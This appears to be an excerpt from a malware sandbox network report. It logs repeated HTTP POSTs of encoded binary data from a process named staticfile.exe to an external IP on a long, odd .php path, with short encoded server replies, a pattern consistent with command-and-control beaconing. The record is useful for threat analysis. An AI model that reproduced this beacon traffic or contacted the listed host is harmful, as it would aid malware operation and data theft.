                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:19.490423918 CET1048OUTData Raw: 54 50 5d 5b 58 42 5a 53 54 58 56 53 59 5a 58 51 55 51 5c 5f 51 5a 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TP][XBZSTXVSYZXQUQ\_QZSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'B("?-<5;Y259=]:^1;?Z4 :-( "</<9[".Z/>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.549865185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:20.194330931 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1300
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:20.552891016 CET1300OUTData Raw: 51 56 5d 5b 5d 48 5a 57 54 58 56 53 59 59 58 51 55 56 5c 5d 51 5d 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QV][]HZWTXVSYYXQUV\]Q]SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$???> !(1?6)'*8:Y%# )V.;<6<U(:9[".Z/2
                  Dec 27, 2024 04:03:21.560009003 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:21.802148104 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:21 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 24 01 23 26 3c 51 2a 2f 2b 0f 33 38 2e 12 2b 21 03 05 3b 13 36 00 29 2e 39 58 2f 3f 0d 5d 36 12 0f 5a 2a 2d 33 10 33 25 34 02 21 1b 2d 5d 02 1a 23 05 23 21 31 1c 27 0d 2b 5c 2c 23 3a 0a 2a 1d 25 02 27 5d 25 0b 25 01 27 1d 20 33 17 1b 31 0c 25 52 2f 37 37 13 2c 37 0a 55 33 00 23 5f 03 14 39 50 22 00 3c 58 24 32 26 5d 23 16 2e 0d 22 24 31 54 2a 38 3f 5c 2a 2b 2e 5c 30 32 28 59 27 13 26 54 2a 3a 2d 0f 23 3f 20 5a 3d 19 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: $#&<Q*/+38.+!;6).9X/?]6Z*-33%4!-]##!1'+\,#:*%']%%' 31%R/77,7U3#_9P"<X$2&]#."$1T*8?\*+.\02(Y'&T*:-#? Z= P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.549866185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:20.314183950 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:20.662308931 CET1048OUTData Raw: 54 52 58 58 58 40 5a 52 54 58 56 53 59 58 58 5d 55 57 5c 5d 51 5e 53 52 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TRXXX@ZRTXVSYXX]UW\]Q^SRT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A(?"(052<1?#)4U*8)'(?Y431S-'!U):9[".Z/6
                  Dec 27, 2024 04:03:21.651324034 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:21.885253906 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:21 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.549871185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:22.124068022 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:22.475735903 CET1048OUTData Raw: 54 5b 58 58 58 47 5a 54 54 58 56 53 59 58 58 52 55 51 5c 5f 51 51 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: T[XXXGZTTXVSYXXRUQ\_QQSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$?:\>=8_!'<*!,>>Z&( 0%-;\6/<?9[".Z/6
                  Dec 27, 2024 04:03:23.548384905 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:23.803596020 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:23 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.549877185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:24.045353889 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:24.396760941 CET1048OUTData Raw: 54 54 5d 5a 58 42 5a 54 54 58 56 53 59 5a 58 53 55 55 5c 5e 51 5c 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TT]ZXBZTTXVSYZXSUU\^Q\SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+&?=<Z"1#X%!!')(=&8#=R.]+",$T)*9[".Z/>
                  Dec 27, 2024 04:03:25.474581003 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:25.731574059 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:25 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.549881185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:25.972417116 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:26.318439007 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:26.375277042 CET1048OUTData Raw: 51 56 58 5f 5d 47 5f 54 54 58 56 53 59 5e 58 51 55 51 5c 5b 51 50 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QVX_]G_TTXVSY^XQUQ\[QPS[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$?)+.6! &1_!:<T)(9'+'#:5?$(*9[".Z/.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.549884185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:26.923355103 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:27.271753073 CET1328OUTData Raw: 54 56 5d 52 5d 49 5a 51 54 58 56 53 59 58 58 55 55 55 5c 5a 51 5c 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TV]R]IZQTXVSYXXUUU\ZQ\SZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F+2\+=?6!01<=[69,=&X28;X4%,+$#?<R(9[".Z/6
                  Dec 27, 2024 04:03:28.303098917 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:28.590434074 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:28 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 59 37 1c 20 51 3d 02 37 08 33 5e 32 55 3c 32 2a 5d 38 2e 31 5f 3d 3e 3e 06 2d 11 28 00 22 3c 3d 58 3d 00 05 5d 27 26 09 5a 35 31 2d 5d 02 1a 20 5a 21 21 3d 54 26 33 27 58 2d 0a 31 1c 3e 1d 22 5e 30 3b 25 09 26 01 33 1d 34 0d 17 1a 26 0b 25 14 39 27 3f 11 3b 09 3f 0d 33 00 23 5f 03 14 39 56 21 2e 28 11 26 57 32 5a 22 28 29 1d 20 34 3d 57 28 3b 23 5a 2b 28 31 05 30 31 23 04 27 2e 32 53 3e 07 25 0c 23 2f 34 12 29 19 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: 'Y7 Q=73^2U<2*]8.1_=>>-("<=X=]'&Z51-] Z!!=T&3'X-1>"^0;%&34&%9'?;?3#_9V!.(&W2Z"() 4=W(;#Z+(101#'.2S>%#/4) P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.549887185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:27.047888994 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:27.396625042 CET1048OUTData Raw: 51 51 5d 5e 5d 46 5f 50 54 58 56 53 59 54 58 51 55 56 5c 5c 51 51 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QQ]^]F_PTXVSYTXQUV\\QQSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A<,>?.<\!1;2?"8*+1;#0%:?"?0(*9[".Z/
                  Dec 27, 2024 04:03:28.571028948 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:28.827425957 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:28 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.549891185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:29.068655014 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:29.427917957 CET1048OUTData Raw: 54 52 58 5d 5d 47 5a 52 54 58 56 53 59 59 58 5c 55 52 5c 5c 51 5b 53 5e 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TRX]]GZRTXVSYYX\UR\\Q[S^T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$?%<=$^!;&<)Z!:;>.Z1 #>-88]! S?9[".Z/2
                  Dec 27, 2024 04:03:30.387459993 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:30.620906115 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:30 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.549895185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:30.868181944 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:31.225050926 CET1048OUTData Raw: 54 51 58 5d 5d 45 5f 57 54 58 56 53 59 55 58 53 55 5d 5c 59 51 58 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TQX]]E_WTXVSYUXSU]\YQXS[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C?"]>.520'?1]#9#=89&#9R-]$"<#<:9[".Z/
                  Dec 27, 2024 04:03:32.236867905 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:32.478205919 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:32 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.549901185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:32.715517044 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:33.068511963 CET1048OUTData Raw: 54 53 58 5f 58 47 5f 50 54 58 56 53 59 55 58 5c 55 51 5c 5c 51 5b 53 53 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TSX_XG_PTXVSYUX\UQ\\Q[SST_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$(Y%(X$Z6!<2?!"$P)-%+/[#0-R.] ^50V+9[".Z/


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.549906185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:33.720586061 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:34.068633080 CET1328OUTData Raw: 54 57 5d 5a 5d 40 5f 56 54 58 56 53 59 5f 58 5c 55 5d 5c 58 51 5e 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TW]Z]@_VTXVSY_X\U]\XQ^S[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$??_+.<#23Y1%!9<)"^%+87!-4\!?<R(*9[".Z/*
                  Dec 27, 2024 04:03:35.043879032 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:35.277029991 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:34 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 12 23 35 20 12 2a 3c 3f 0e 30 06 08 1f 3f 31 29 05 3b 13 35 1c 29 2d 3a 00 2e 01 2c 02 35 2c 07 1e 28 2e 34 04 30 0f 27 58 21 0b 2d 5d 02 1a 23 03 22 31 36 08 27 0d 37 1e 2d 1d 25 1c 2a 23 29 02 30 05 2e 55 31 06 24 0d 34 55 3e 09 25 21 39 14 2e 42 3b 13 2f 19 0e 53 25 3a 23 5f 03 14 3a 0b 21 58 20 11 26 31 26 1e 37 38 22 0f 36 24 07 55 3d 38 37 10 2b 28 2e 5a 24 1f 34 5c 24 13 22 53 2a 17 0c 54 35 3f 20 11 2a 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '#5 *<?0?1);5)-:.,5,(.40'X!-]#"16'7-%*#)0.U1$4U>%!9.B;/S%:#_:!X &1&78"6$U=87+(.Z$4\$"S*T5? *# P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.549907185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:33.842535019 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1044
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:34.194942951 CET1044OUTData Raw: 51 51 5d 52 58 40 5a 53 54 58 56 53 59 5c 58 57 55 57 5c 5b 51 51 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QQ]RX@ZSTXVSY\XWUW\[QQS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+.\<.6"'2/54>&(+Y7=S,;?! S?:9[".Z/.
                  Dec 27, 2024 04:03:35.212124109 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:35.454196930 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:34 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  42192.168.2.549911185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:03:35.699070930 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:03:36.052874088 CET1048OUTData Raw: 54 54 5d 5b 58 47 5a 51 54 58 56 53 59 58 58 53 55 52 5c 58 51 58 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
